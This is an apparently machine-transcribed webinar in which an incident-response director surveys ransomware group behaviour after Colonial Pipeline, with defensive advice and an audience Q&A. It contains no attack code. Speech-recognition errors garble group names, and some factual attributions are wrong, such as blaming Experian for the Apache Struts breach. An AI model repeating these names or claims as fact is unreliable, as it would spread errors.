Ransomware Upheaval: Trends from the Trenches After Colonial Pipeline

i'm going to share a little something with you guys right now so just to get us while we're waiting here just to take a look at this is the uh the conti ransomware groups leak site so this is them live uh we're currently dealing with them i could i would show you the chat but it's got client names and stuff in it so that wouldn't be bad yeah i probably don't want to uh yeah but this is uh this is there's you guys could take a look at it and this is this is what they do uh when there's a leak this is what it looks like all right just let me know when you guys are ready

to get going here and i'll i'll throw up the presentation we'll do some chat yeah i think we are and he's actually always got do you mind if we record the presentation and put it on youtube uh oh absolutely not absolutely not all right good and ryan i still have to post yours if you're good with that from last one yeah okay so i'll get those uh hopefully this weekend and i'll get those out there so you know a lot of folks that weren't able to attend ryan's last month and and i know there's some folks that aren't going to be able to make it today but still want to be able to watch the presentation so

i appreciate that for for you guys letting us share so without further ado then uh ryan do you want to give uh keith a little introduction or sure i'll do that uh glad to be with everyone today um i have my colleague and co-worker keith swanson with us uh keith is former law enforcement used to work on the the secret service task force networks uh at kivu with myself he's one of our directors of incident response and he leads our counterintelligence um an extortion team so we thought this would be you know a really timely a very timely presentation now after the events of last weekend um and then you know we're about a month out from a

month and a half out i think or so from colonial pipeline and we've seen a lot of changes happen in the environment so we're just going to go through some of those trends of what's been what we're seeing um hopefully you know some of this information is obviously useful and helpful to you all and your organizations um and being prepared for that potential next big moment um that comes up so uh with that just turn over to keith thanks ryan um as you guys can see i put this up here you know this is live this morning uh comedy's uh league site and that's what we're up against let me uh we'll switch over to

uh the uh presentation and we'll start going through that guys and then we'll get it going it's um we're just going to talk about some of the changes that have been going on in the ransomware and some of the different tools a lot of this may be repeat for some of you guys but it's always good just to you know there's so much going on in the world just to kind of go through everything again so basically we started in 2009 uh we focus on the cyber insurance response and we get involved in just about everything anyway any kind of breach a lot of ransomware work that's our bread and butter um just you know expert witness testimony

everything we have offices in europe and uh here in the states uh we've got people all over the country we can bring resources to bear rather quickly not only do we do investigations and forensics and ransomware and all that stuff we also have a post breach recovery team remediation recovery team which can give you guys extra hands-on on a scene lord knows uh when doing these things goes down there's a lot of red bull and monster being being consumed and we can provide some help these guys go in they rebuilt everything from a two-person mom-and-pop shop up to giant universities so they've got a lot of resources that we can bring to you guys me like ryan said i'm an old i'm an old

retired detective um i had 26 years in law enforcement and uh one day and obviously i'm a lot older than that picture i need to get a new head shot ryan um one day the lieutenant walks in and says hey you know things about computers we're gonna put you in this computer forensics computer crimes that we're gonna be doing i'm like uh okay and that started all of this um after my retirement i went to work for both cbs health and the american express global business travel and these large enterprise environments of cvs at that time we had 660 000 endpoints a lot of fun a lot a lot of late nights and a lot of things going on there and

america's global business travel we were actually spinning off of the larger american express organization so we built an entire security program there from scratch then i ended up coming here to kivu uh i've arrested hackers um as part of the secret service task force we have done interstate fraud hacking just about anything i've sat in the room we've interviewed these guys um we've had an opportunity to get a lot of different intelligence from these guys from the fed uh you know just a ton of information this actually was one of the best experiences in my career uh you know hanging out with those guys and and being able to participate in many of their functions

i even got to do a little bit of protection one time that was interesting as heck so it was uh can't say anything bad about my my career it's been long and there's bags under the eyes but you know i've enjoyed every minute of it let's talk about the threat landscape the colonial pipeline and dark side deal has taken the threat landscape and turned it upside down okay we all have seen the stuff on on the news this thing had more press than pretty much any ransomware attack we've seen in a long time uh what happened was on may 7th darkseid got into these guys darkseid uses a different different tactics they love rdp if they

find an rdp boom they're on it but they'll they use different they're not against using phishing emails or anything like that so they get into colonial park gloria pipeline on may 7. darkseid uses a rather extensive i think it's rsa encryption and they customize keys for each of their victims so there's no universal decrypter for a dark side the ransom in this case here ended up being paid was 4.4 million and the the poor president and ceo of colonial pipeline was stuck between the decision do i pay the ransom or i can't get my pipeline back up and running for over a month pay get the pipeline so really fuel prices i i live in arizona and the effect on fuel

prices out here from this event was when we were feeling it out here they were rising out here we're not even on the colonial pipeline so he made the ultimate decision to pay the rent so fbi gets involved um anytime you touch big oil or anything like that there's you're going to get a lot of attention and darkseid kind of screwed up here so the bureau gets involved and they got in to and seized dark side servers and they ended up finding a private key to a bitcoin wallet and boom they were in the bitcoin wallet and they were able to recall 2.4 million of the money back now dark sides has been quote unquote down uh since

this uh this operation and uh it is just consent all the groups are just going crazy after this because this is the first time that we've really seen the bureau reach out and use rico against these guys effectively and then you know season 2.4 million back from these guys out of the blockchain was a big deal very big deal so fbi is not done yet there's a lot of stuff going on um i had lunch last week with a couple of guys in the bureau um and they were talking about some of the operations that are going on there's going to be some more coming uh the biden administration obviously you know this gets press and

they're going to give it some uh some attention because the press and so these these groups are going to be under some pressure and they're responding so groups have stated that they're shutting down so it are they no they're not they're not going to walk away from money like this the abaddon group said that okay we're ceasing operations and they gave all their private keys to bleepingcomputer.com there's no way in the world these guys are walking away from this kind of money they're just going to retool and they're going to go out and reorganize already seeing it we found new sites up the new shame sites called by society and a site called marketo popped up that

claimed it was the auction site the the whole clearinghouse for stolen data uh marketo is down right now i checked it this morning um it's getting a lot of attention but we're also you know we're gonna see these groups rebrand and rethink themselves we're also starting to see we knew this was coming after dark side attacks that are appearing to be lone wolves they're not they're not they're not identifying themselves they're not they're not going to be acting like oh hey i mean abaddon had a really cool looking logo and dark side out they're not going to identify themselves as a group the reason for that is if you commit a crime in the furtherance of a criminal

syndicate or a criminal structure like a gang or anything like that rico can be used against you that was designed back in the day to take down you know uh al capone and the mafia well they're using it against these groups so now they've realized wait a minute we don't want to have these shame sites with with uh you know so hey we're in this group or where that we go you know we're gonna not stop that you're going to see a lot more loosely organized individuals on the surface but behind them that organization structure is still there they're just not going to say who they are they're commun they're changing their communication tactics uh the phobos group went to a completely

encrypted chat portal you can't even see the chat histories it's all encrypted so you only you can send and you can see the one that's sent to you and after that it's all encrypted uh this is in response to what they're there they think is going on and what information they have about what we do because we can we collect all these chats that we do and we watch the different verbs that these guys are using in the way they talk to us each group is different right they all have their version of broken english uh but within the groups each individual person that we're on the other computer acts differently towards us and we know we can tell when we're in a

chat when somebody else takes over on the keyboard and if we got some if we're dealing with somebody who's just a jerk and we see somebody okay switch over i8 then we move quicker we try to get that person because they'll make us a better deal or something like that um it's this this ransomware you know ransom is going up you guys saw this thing with paseo over the weekend uh our evil son okay stated they wanted seven million globally that's a prime example these guys are trying to fortify their war chests they want to get as much money in there get it protected get it moved out of the blockchain get it into bank accounts before that

something happens and they get recode they get 2.4 million dollars taking from them they're scared to death of that okay so that's what's going on right now with the groups the other thing we're seeing is re-extortion there's they're digging in their heels they'll say oh yeah pay me forty thousand dollars and i'll give you the keys so you pay him forty five thousand forty thousand dollars and come back and say uh sorry um i want another forty thousand more we're seeing a lot of that right now uh this this this cassette attack with our evil solid okay this is their their tactics in this attack are completely different than anything that this group has ever

done they've never had hit anything like this typically when our evo or solar economy comes in they're going to take data and they're going to they're going to extort it for every last time they can in this hit here they haven't taken any data that we know of and they are not threatening to publish any data from this case absolutely insane so but they're charging upwards of 45 to 50 000 per unique file extension on the encrypted files we've had clients that had seven uh seven to ten different unique encrypted file extensions 50 each 500 grand to get everything deprived uh they have not been negotiated they have been flat out no that tells me that they're trying to

get as much cash as they can and their quote unquote going to shut down so threat vectors listen a lot of this stuff you guys understand and know but drive-by scan and attack these guys are constantly scanning they're made they never stop they're always looking for a crack uh that's what happened was experian didn't patch a uh an apache strut server boom in and that that's all it takes they're they're opportunistic um they will not stick to just one technique they've learned over time that you know you really limit yourself uh if you're using one technique so they they will use whatever they can get their hands on um they're constantly buying information on the dark web they're constantly

looking for zero days they can get their hands on um the odds are that our evil son okabe did not find this cassaya zero day they actually bought it and then exploited it you know old applications uh unpatched vulnerable programs they're all you know remote services uh rdp uh team viewer those saying they're always they're pounding the heck out of these things uh they're they're in there at all times um we've seen them go after uh fortigate had a problem with their vpns there was a vulnerability if you didn't patch it and it's we've seen we've had more than one client come in because they didn't patch that that thing in time and boom they got in

anytime you put a hardware edition i've seen we've had a couple clients that you know stood up hardware um before getting it secured and boom they hit him you know phishing emails this and that's been around forever it's never going to go away you know that's they're they're looking at the human side of things if you if you send my wife an email that says click here for a free amazon gift card she's clicking on it i guarantee you that that's going to happen supply chain chain compromises are are a big deal that's what happened in the target hack their hvac vendor their ac vendor was vulnerable and they had a connection to the target

enterprise network they got into the ac vendor because they didn't have the same security standards that target did boom and you guys we all know what happened to that when we heard the heck of it that was that was nightmarish i got a cousin that works in the legal department at uh at target and it was a nightmare for those guys uh so i know uh that target you know they're big enough to go ahead and you know survive a hit like that but a lot of clients aren't and then valid accounts there's so many dumps oh my god if you look at my name on the on the dark web you're going to find me all

over the place there's so many data dumps anymore for somebody to say well my my information is not out there that's that's not true you're out there if you've purchased a house or a car after experian and everything all these guys get hit you're out there the dod got hit you're out there your information is on the web i just got a letter from capital one yesterday saying oh we've turned down your uh credit card application well that's because i have my credit file lock my wife is a retired fraud detective of course i have my credit with my my credit file lock and they weren't able to get in why because my name's out there my stuff's out there

it's just the way society is these days ransomware here's the uh the official definition of ransomware it's rather long i like to use and tell people that ransomware is nothing more than a way of making sure you can't use your stuff and uh that's really what it boils down to there's a lot of different uh encryption variations some will use elliptical um some are using diffie-hellman i mean there's there's so many different ways to encrypt the key to it all is a lot of people are looking for that universal decrypter and these guys have learned to make sure that you do not use the same key twice ever they've learned that how does it work the old phishing email

we all i mean we're on information security so this this is what keeps us up at night because you know somebody's going to click on that on that excel and it's going to fire off a macro and that macro is going to call out to a c2 server that c2 server is going to download cobalt strike and kobo strikes and open a beacon and away we go and this is absolutely insane it's not going to go away um there is no tool out there that you can say hey i'm good i'm good it doesn't work that way for every tool that's put up in every every defense we set up there's some nerd in his mom's basement or

in a windowless room in north korea or russia that's trying to figure out how to get around that tool and they're going to there's there's no sure thing here we once had a client says keith i need you to write me a letter that says that we're 100 secure can't do that there's no such thing as 100 secure you know my network here at home is not 100 secured my kid hacks it all the time that's what i get for having an autistic kid she can get into anything so we are definitely definitely seeing a lot more sophisticated attacks this case attack yeah that's huge uh that was a good one uh you know the uh uh microsoft exchange

vulnerability uh when half him got into that interesting i i don't know what happened end game wasn't that they had a hook into how many systems we saw very little data exploration on those systems we saw maybe a handful get locked up with ransomware but really i don't understand what happened end game was maybe they got interrupted before they were able to fire fire off a ransomware campaign or a data exploration campaign not sure but that one was weird uh business impacts are huge absolutely huge you you're getting one of these things you're bleeding money you're bleeding money uh you're down you're you're everything your finance payroll any retail operations it's down and money's flying out the

door because you're paying us obviously and you're going to be getting you have to get your hardware you're going to have to buy you know it just flies out the door this third one is the big deal ransomware is a service these guys are franchising their operations and we know when we're dealing with the ransomware as a service crew because we can see it in the communications these guys are trying to play hardball like they're kind of you know big men on campus no no we're not going to do that and you know we've actually had some when we've gone back to the original group and said hey you need to calm your boy down over

here because uh he's going to ruin your reputation so that is a that's not i mean that's huge it's like the old late night no you you can't sleep when you're up at one o'clock in the morning and you have hey make money with my uh my real estate system i'll teach you how to become a millionaire they're doing the same thing on the dark web i'm trying to buy into one of these things to see what we can get into and and learn um the uh what was it uh lock bit they got into lock bits ransomware as a service console some researchers did shut down lockdown for uh they haven't seen them back up

yet and data exfiltration last year we maybe saw a handful of cases where they're taking data right now i will tell you pretty much every case assume they took it absolutely assume it if they don't say it right away they may come back and and say yeah i took it we just had a case where we they settled they got the keys everything else a month later a guy comes back oh by the way i took your day to pay me more and that that's that's what's happening right now they want the bucks and and a lot of people are paying them to avoid the bad publicity you know there's been so many breaches right now

uh you know bad publicity it's not as it's not as bad as it was when target got hit or home deep or any of those guys but still it you know people still freak out that there's been a breach and and they're going you're going to lose business random spray and play that's what they're gonna do they're just throwing everything out there internet crime is not about ripping off one person for a million bucks and this comes straight from a guy named eric weinstein that i arrested oh god i think i hit eric in 2009. and i was interviewing eric and he says detective the key to internet crime is not ripping off one person for a million bucks it's

ripping off a million people for a buck the internet lets you do that because you can automate it this guy was listing 35 000 things a day on ebay he didn't have any of them to sell and they were all five six bucks no one's gonna see no one's gonna look at that you'll get five six bucks yeah whatever and then it's not going to get much attention and even even from law enforcement the only reason i got into eric is because we got into that volume and saw that volume and ebay gave me a phone call we started working targeted attacks is what everybody thinks is going on these are more when you start looking at

nation states and you're getting involved with some very very very sophisticated individuals they're going to say i want to go hit american express okay how can i go hit american express i mean it is a full-on typically almost cyber warfare at this point we've had some talks with some energy providers and they're like well what happens if you know uh you know like 20 energy providers on the grid get attacked i said that's called cyber warfare and that means that the byte administration is going to go hey cyber command you're on and we're i mean that's the way it goes so targeted attacks right now we don't see a ton of them we typically see these random attacks where just

spray and pray see if they can get in the door and go but if you have a large you know or some very very valuable information uh you work for atheist general dynamics or something like that yeah you're gonna get targeted and you need to be working on it defending a targeted attack and a random attack at the same time because lord knows things happen what do we do the old defense and debt stuff this comes right from cissp guys um nothing crazy but it's always good to go back over it and and think about it you know antivirus i cannot tell you how many clients come to us and they're only running antivirus that's all they got

antivirus in the firewall and time and time again i would say probably oh probably 99.8 percent of our clients that's all they've got running signature-based stuff is is done these guys are using polymorphic malware and what they've done is they've taken the old drydex and trick bottom all these things and they expand the code at 100 to 200 bytes and then they just random generate in that in those 200 bytes boom you change the file signature antivirus is pretty gone that's where you get into the old endpoint detection and response tools the crowdstrikes the carbon blacks these are ones that are monitoring and watching for goofy behavior one of the tools that we see these guys

use all the time is they will fire off a basin 64 encoded script to bring up cobalt strike into memory and start the beacon well a basin 64 coded script will set off an alert in crowdstrike it will every time i've used crowdstrike at both cvs and american express and if any time a base64 goes it's going to hit you should never turn that one off because i'm telling you right now that's one of the favorite techniques of the bad guys is they will use base64 encoder scripts they think by including it we're not gonna see it that tells you wait a minute something happened on this machine now you need to watch that machine

cobalt strike is an old pen is a pen test tool it got out into the environment we saw a cobalt strike on five cases a year ago now every case it runs in ram it leaves very little if any forensic evidence on the on the hard drives absolutely a pain in the butt you can sit there and basically it's just like having an open pipe right into the computers right into your networks once that beacon is up and running and it's very difficult to detect one of the things that we look for is we look for the tools that come in to deploy cobalt stripe that tells us what's been going on but if that is flying out the door in a

cobalt strike beacon doesn't leave anything on the hard drive it doesn't need another hard drive most of your edr's right now are detecting the cobalt strike beacon and it'll flat you know there should be a siren and red lights and everything when i was running the security operations center for for amex i played a sign up on the wall that said any vehicle hunt on krebs is a good day the rest of these are pretty simple stuff vulnerability management patch management you need to be looking at your network you need to be looking for holes you need to be looking for things there's i'm an old man and i've only had one cup of coffee this morning so i

can't remember everything that's going on in my network so it's always good to go in and let's let's take a look at what's vulnerable just to make sure we're patching get a pen test done um one of the things that we are seeing is very very very fruitful for organizations is purple team don't just you know red team is fun you know if you're the red team it's fun if you're a blue team it's not that much fun so a purple team we bring in the red team to sit right next to the blue team and while they're hitting you you should they're talking to you about what you should be seeing and vice versa i did one of these when i

was at amex and it was my guys loved it they absolutely loved it they sat down the pen testers were like hey i'm firing off that metasploit and the guy's like i see it okay and then you know we were working from there and it really really trained up these guys like that user trading let's face life man the human factor i can tell my wife stop clicking on those links she's gonna click on them it's gonna happen heck i even designed fishing training that i caught myself and i had to go to remedial fishing training that i put together disaster recovery we all know disaster recovery here's the difference with disaster recovery what we see from

clients is yeah they've got backups and they've been a disaster recovery plan but they never tested it and then something happens and now oh crap it's going to take me a week just to restore a couple of backups because they don't know they've never had that train like it's like it's real man train like it's real take some time run through a scenario make sure you can get back up from your backups we all yeah we've got them we know what to do but they're with anything else you fire up the you know the blue bar starts going across and something like boom okay make sure that that's going on in there and we talk to

you know i talk to cios and ceos all the time and it's like when is this going to be done what is this going to be done you don't know man you don't know because there's way too many variables to control during one of these incidents to try to tell you listen this is going to take two days it could take 10 minutes it could take a week you know when i'm processing forensic evidence i've seen things be done processing in less than a day and i've seen things take over a week so it's there's all these different variables that you can't control and obviously cyber insurance is a big big deal to help cover some of these costs

they are just they literally cannot tell you guys how fast our clients are bleeding money multi-factor you guys hear a lot about multi-factor and i did a talk with hanover insurance a while back a lot of people think multi-factor is that's the key if you have multi-factor you're done not really what about a zero day there's been multi-factor authentication two-factor recommendation that had that's had problems that has had holes is it a great tool absolutely awesome tool but it's not the end-all be-all and uh the insurance industry was talking about oh yeah multi-factor multi-factor multi-factor just standing up multi-factor is not going to protect you completely you still need the rest of the tools you

still need these things because something's going to get around something's going to get past that multi-factor multifactor these guys are constantly working on different techniques to get past it anti-virus we talked about that the polymorphic stuff every group is using polymorphic every time that their tools get downloaded from the human control servers it's got a different file signature we've got to bring more up from than just antivirus pdrs this is where it's at guys um this is these are the tools right now that are probably the best in class uh we use crowdstrike we partner with crowdstrike here at kivu i've used crossstrike in large environments it's very very good um it's a it's a very very uh solid

product and it helps protect and the thing about it is if something gets past everything and it affects the machine it's a you can isolate that machine with a keystroke i think it's isolated so now instead of having 50 computers inspected you have one that really is the key is like okay somebody's going to get in the door you're just going to slam the door on them and cut off their heads disaster recovery the plan is the key uh and i'm aging myself with the reference to the va team there i'm absolutely engaging myself with reference to 18. but the bottom line is is the big problem that we see is yep we got a plan when was last time you

you you ran a test on it or you tried to recover uh we never have and things pop up and things go boom during the backup process you know automated backups are great you know but there's always there's always something the three two one rule even my wife has figured this one out and she's the most untechnical person in the world that woman could break an iphone three copies of your data one in production one in an online backup for business continuity in cases of system crashes that last one one offline for disaster recovery that's the key if you're using something like veeam great tool man great tool but if it's still online and the bad guy sees it they're all over

it they're going to encrypt that sucker or they're going to delete it you're done you got to pay them because you don't have any more backups if you keep that one copy offline with a bad guy can't see it there's no connection from your network to that copy of the disaster recovery backups you're golden now you can start bringing those things in start bringing everything back up to speed you can get back up running a heck of a lot quicker and you don't make you don't have to pay a ransom at that point you don't have to pay so obviously the frequency of the data is based on how much can you guys risk losing and still be able to

function is that you know hey i can lose a week hey saturday night at two o'clock in the morning let's run a full back up kick it offline to maybe throw it in aws or something like that and then close that net and close that hole and then get back to work here's what it looks like cyber insurance but if you guys get hit you're going to call your cyber insurance company they're going to call a breach coach the breach coach our attorney said are this is what they do they're all about the privacy laws they're all about the regulations and they're going to walk you through that they're going to call us hopefully us

right and they're gonna get we're gonna get started do we need to talk to the bad guys we're gonna sit on a scoping call we're gonna say all right where you guys at you guys tell me hey listen i've got backups um it's gonna take me a week or so to get recovered from backups can you buy me some time excellent my team's gonna get a hold of these guys we're gonna start talking to them and we're gonna start dragging these things out just making it you know drag drag drag drag drag and get you that time or if you come up and tell me say keith i don't have any backups they deleted them we're completely burnt down

and we're losing a million dollars a day all right we're going to speed that thing up you're not going to get the best price because obviously the longer we can negotiate or work these guys over the best we can but we're going to get you those keys as quickly as possible for the best price we can and you know we're gonna we always make these guys prove number one you gotta prove what they pay for you know that they can decrypt you get what you paid for and we we know all these different groups for example the phobos group their decrypters stink absolutely distinct because we only see maybe 60 to 65 file recovery and that's after going

back three or four times and getting re-extorted three or four times with this junk that these guys are putting out so we can help you with all that we have our forensic team our instant response teams they're going to come in and they're going to look at all the evidence we have a tool we created called tech where the hell with this was when i was working all those cases at two o'clock in the morning imaging computers should have smacked my old boss but it collects just the logs we need only the logs that we need and leaves it so we can scalpel through these this information as quickly as possible and get to patient zero

tell you guys what happened see what data was taken and get the answers to the attorneys so that you guys can make the legal moves that you need to make did you pay well there's a lot of things you mean the fbi says never pay it well that's great you know and when i was a cop never pay but when you're burnt down and your business is basically done and 500 people are out of a job you know it's not as simple as that and i understand that now um we can't pay some people the office of foreign asset control otak has sanctioned a couple of groups uh one of them being evil corp uh and you're gonna see there's some

articles running around and found on linkedin that said that our evil sonoka bee is linked to evil corp we have never seen that i don't know where this reporter got that information i challenged her on it on on linkedin i haven't heard back from it but our evil soldiers have been in place for a long time and we know there's no connection to that because evil corp who is another group yeah they're sanctioned there there's there's sanctions against them and you cannot pay anybody that may have links to evil court you cannot pay anybody that has links to iran cuba north korea so we that's a big deal and we take that very seriously here

we go through a an investigation just just to determine that gdpr pci uh a hipaa these kind of things what kind of regulations are there under hipaa rules and this is coming from the attorneys the breach coaches they told me that even having a ransomware event is considered a breach period whether they took data or not and uh so there's but there's some legalities and those that's what those breach approaches are for i i tried to read like the california uh privacy and notification laws i i woke up three days later i don't know what happened business factors this is the thing how long can you survive listen you know target's got all kinds of resources huge

corporation they could survive that hit can your court your organization survive a hit like that you know that that is you know that's a question that you have to think about technical factors one of the things that a lot of the ceos and the cfos and all the the c-suite do not understand is if you buy these keys it's not like here's the key you run it and all the lights come on and everything's fine that's not the way it works minimum minimum if you pay for decryption keys and tools you've got a minimum of at least a week it just destroys databases corrupt files connections are dead you there's so much that you have to fix even after

decryption that at a minimum it's going to be a week and there's no way around that there's you cannot throw enough people at it the computers only run so fast if you've got a two terabyte database that you need to decrypt you're going to be there for a while decrypting it the little the little green bar is going to be real slow running across the screen i wouldn't bet on that one so these are the likelihood of decryption succeeding that's what we watch we talk to all of our clients and say how much did you guys get back oh we got like 95 percent of our files back we great we make a note you know so that

way we know hey this group 95 comes back this is the time for question guys uh just fire them out there um you know like i said i've been uh involved with law enforcement on the federal side on the task force on the local side state side um we've arrested a ton of these guys you know we're in the my team is is into the chat rooms in the dark web we're watching these guys we're talking to them on a daily basis um i have yet to have any send me a case of vodka but i have asked but you know i've yet to have anybody send me a case so fire away

oh come on guys you gotta have something for me so you either scare them the death keys or or something i heard someone hey this is dave burlingame um i had a bad connection in the the beginning of this is i and i see that this recording has uh or that this session's been recorded can i get a copy or access to it so i can hear the first part yes sir um david michael is hoping to be able to pull these down and upload him to youtube um he said this weekend so okay yeah well uh seriously you know my information's on the screen brian has it we can get it to you guys if you guys

have questions questions are free my team is always available to assist anybody with questions about these ransomware groups um it's forever changing don't don't ever feel not going to charge your time send a question we'll take care of your money for someone looking to get into the field of what you do particularly threat intelligence where would you recommend starting sans has got a really good threat intelligence course um it's it's a good place to start their courses are expensive but we all know that they're pretty damn good training that's a good place to start because there's a lot of different tools out there there's some open source tools samosa and stuff and then there's also some you know paid for platforms

and just having the knowledge of what's out there and you know some some hands-on to start using it is key you know the hard part about threat intelligence is there's so much of it and a lot of it is a repeat of what somebody else said to try to get it vetted down into something that you can use so i would start with something like that um the other thing is there's a ton of blogs out there i mean we all know about krebs um brian's brian writes some really good stuff um met the guy a few times really got a lot of insight into these threat actors uh bleeping computer is a good source um

you can get on a dark web but obviously there's no google for the dark webs you're gonna have to put hunt and poke around a little bit and see what you can find we've gotten into some chat rooms on uh that are in russian uh so i have to you know use google translate a lot but you know start with something like that um from a threat intelligence standpoint uh look at the mis misp the mist server it is a free tool that you can get feeds into as open source very great tool and that's that's where i would go to get started on thank you sir hey this is barbara carr yes sir yeah i just appreciate it man

gif that that's a that's a good start for us not technical security people um but i think it's it's this this environment you just described is kind of challenging nowadays because of all these work from home especially people bringing their work laptop at home and come the next day to the office and all those things will open doors for all these guys um i'm working on the healthcare system and that's one of the nowadays one of the most targeted beside the banks um so what do you what's your recommendation what what you feel about it with all this everything going and going on and well right now well my first thought is that investing in commercial real estate is

bad i would not do it right now because people here people don't want to go back to the office and the number one thing is nothing touches your network that you do not have security control over ever period okay we've seen clients before they're allowing their client you know their workers to use their personal laptops to connect into the network get a gold image with all your security tools on it make sure everything across the board has all your security tools vpn nothing touches your network without a vpn ever okay make sure that you're patching the hell out of that vpn because fortigate just had a problem with theirs but vpn i have seen uh when i was at american express we

were looking at going to a vdi environment where we were going to be giving our work from home people basically a dumb terminal and all that terminal could do is it could connect one ip and it would spin up a vm and at the end of the day when they were done and they shut down it killed that vm and that dumb terminal couldn't do anything else that's expensive but that's an option the other thing is is we have we have seen some clients and i know some organizations that will go to their work from home and set up their networks for them and make sure that they're secure um a lot of people you know they bring

the modem in and they put a you know it could be god knows what kind of router they're using um but they don't have any security set into it they're not even using you know wpa they're using completely or the thing is so old it's ancient and uh so getting control and putting some controls on that is you know if somebody wants to work from home you know you need to help them out a little bit with that from an organization standpoint um so we have seen some organizations do that to tell you how bad it can be i was at cvs we had a work from home employee that was living in iowa that was using dial up to a party line

and that's all hypno information at cvs so yeah it's it is a challenge it's going to be a challenge um i know that there are some companies that are working on some new products that are coming out that for this very challenge but i don't think it's they're mature enough yet to be deployed so first things first make sure that anything touches that touches your network has your security tools on it can be monitored and nothing connects unless it's your vpn hey keith um thank you going off of uh luke's question uh for someone who is not currently in infosec but looking to transition into it from a different field but targeting moving into cti into

threat intel what kind of path would you um recommend there is there you know spending some time in a sock first or what would you recommend that's kind of the stepping stones to move into cti i think it would i think spending some time in a sock to start out is the key i teach at the university of advancing technology here in phoenix i tell all the guys there go get your go get your foot in the door of the sock now you're seeing everything live time and it gives you a great reference point to move into cti because you've seen the actions of the people that you're studying okay you see what they're doing

to start out just in cti alone you're missing that operational component okay i'm a big fan of general uh stanley mcchrystal he wrote the book called team of teams and uh general mcchrystal was the guy who hunted down elsa carly in iraq and when he got to iraq they had a problem you had all the intel people over here doing their thing and they had the seal team operators and delta over here doing their thing and they were both barking at each other because the intel guys are giving out old intel and the operators like hey we're getting wiped out out here because of your old intel and you know and the intel guys like

well you're giving us you know hard drives and crap we don't even know where it came from so what the crystal did is he made the intel people go out on some of the raids with the operators and he made the operators go sit down with the intel people if you watch the movie zero dark 30 after they kill bin laden in the movie you'll see the seal team six bagging and tagging everything that's because of what gentleman crystal did so that operational and you know being able to mesh operations and intelligence like that is the key so i would start in a sock get your foot in the door of the sock start looking at what's going on

watch the attacks going on live time see the techniques these guys are doing then start moving into threat intelligence from there the sock is i think is the key to any career in information security start there and then hey i like doing this or i like doing that and you can work your way through it thanks no problem anytime hey keith you specifically mentioned uh crowdstrike and um um the other one um oh carbon black carbon black yeah uh what about others the microsoft atps the other products in that are there any that you specifically do or don't and like and why you know i don't i don't know the reason i talk about crowdstrike and karen blacker those are

the two that most and that i've used in in defending in enterprise environments um there's a lot of really good tools out there microsoft atp microsoft is really working hard to bring up their security level we've had some clients have pretty good luck with that um sentinel one i've seen some really good things coming out of sentinel one so there's a lot of really great tools out there as long as the tool is number one it can be monitored and it's not just looking at file signatures it's looking at file behaviors and process behaviors that's a start um the crowdstrike falcon platform i'm a i'm a big interface guy okay if it takes me 80 clicks or i have

to write 27 command lines to try to get the information that's wasting time and during an incident time is of the essence so if that interface does something like that that's a big factor to me and that's something to take a look at when you're dealing with these things how is that information being presented to your people so you can take action quickly because the quicker i go that's bad and you can hit that isolate button the better that's the big factor when i'm looking at it because a lot of these things are really really close to what they can do in in in scope but to me i think that easy use is key so

um i wouldn't say there's anyone that i would stay away from or anything like that or that i would endorse i just talk about crowdstrike and carl black because i'm very familiar with those interfaces because i've used both worlds in large environments thanks anytime yeah absolutely guys david just a comment there so i was talk talking to our our managed services person this morning um and he has done an atp or an apt sorry simulation between two of those products sentinel one and um and crowdstrike um and the only reason i make the comment is he said during that simulation crowdstrike detected 13 more you know events of of that simulation than sentinel one so there definitely is there are

differences between the products and they are going to catch different things um you know they're they're and we we partner with sofos for one of those smaller businesses that may not be able to to go with a crowdstrike type play um they're all going to be different but i think at the end of the day to a point keith made earlier one of those you know whatever you choose that is an edr platform is going to be better than not having an edr platform yeah absolutely and i'm sorry ryan that you had to talk to mullins this morning that's never good first thing you know you're talking about dude we we give each other crap we have to make each

other smile around here because there's some long days and some long nights so i was up to four o'clock in the morning the other night doing some communications and i'm an old man i can't be doing that anymore keith i appreciate your time today um i just had a question about where you see uh a lot of the countries that are attacking i mean you hear a lot about russia and romania somebody if you saw a lot of other countries as well that were big players that we should look out for that maybe don't get as much media attention you know um most of our guys we call it kiev time that's the joker on my team

we're talking to these guys is because they come from that old eastern block the old soviet bloc i was in the military in the 80s that was the evil empire back then right and when after everything broke up that's where we see a lot of these guys come from i've actually been able to listen to these guys when they they called one of our victims and left the voicemail and they're absolutely from that area so i would say anything coming out of you know if it's got stan in the name or way too many consonants that i can't pronounce i'm not trying to be funny i can't pronounce half of those countries names i just

can't well yeah all that serbia bosnia um that whole area nigeria is very active the old princes are at it man they figured out they can make money on this one um we have seen argentina on a couple of cases uh the problem being is that with vpn's services out there i can look like i'm coming from anywhere so that's that's the big issue is that with the vpn uh looks like i'm coming from the netherlands well the netherlands is not a traditional uh adversary but we do see a lot of activity coming out of the netherlands lately off of vpn services so it's very difficult um i tell we tell clients a lot that if listen if you

don't do a business outside the united states petal block geoblock why is that cbs we geoblock there's not a cvs store in china russia or europe geoblock anything that comes from outside the united states and uh so i was that one was easy american express that was a little bit more difficult so all right thanks hey keith oh this is adam i got a question for you um just to clarify um you typically work with cyber insurance companies but but you guys don't provide insurance is that correct yeah we don't provide insurance but we're not that big uh we but we the cyber insurance companies will hire the breach approaches in us um because you have to be on the board or

the panel or whatever they call it um and you have to be approved by the cyber insurance company and then i think we're on everybody's panel we've been around a long time pretty much everybody's final and then they bring us in excellent so um but so i i'd imagine you you probably you know typically work with them or at least with your customers and everything so the question i have is about cyber security insurance and basically what insurance will look like in the next five or ten years um you know right right now you know there's a thought that having insurance may incentivize cyber criminals to kind of engage knowing that a company may have you know

kind of the financial backing to pay the rent somewhere um you know i i don't know if i would agree with that um i think that it is a factor but i don't think it's the only factor i think overall these groups know about cyber insurance from a you know an umbrella standpoint but i don't think having a having insurance it's not like these guys have a list of who has insurance and who doesn't right they don't have that kind of information um i know that cyber insurance is changing um i had a call with the vice president of cyber for hanover insurance and the way that they write these policies is changing um because they're they're

losing money on these things up and right insurance companies don't like to lose money um they're gonna i think what you're gonna start seeing is in order to get a cyber insurance policy you're going to have to meet some minimum standards as far as security posture goes i see that coming rather quickly i know they're really talking about mfa and you know at a minimum having mfa involved which i mean a mfa is great but it's not the end of deal that's i'm talking to them about that so i think you're going to see some stuff start to pop up on that side of it um but i think in this case here i think

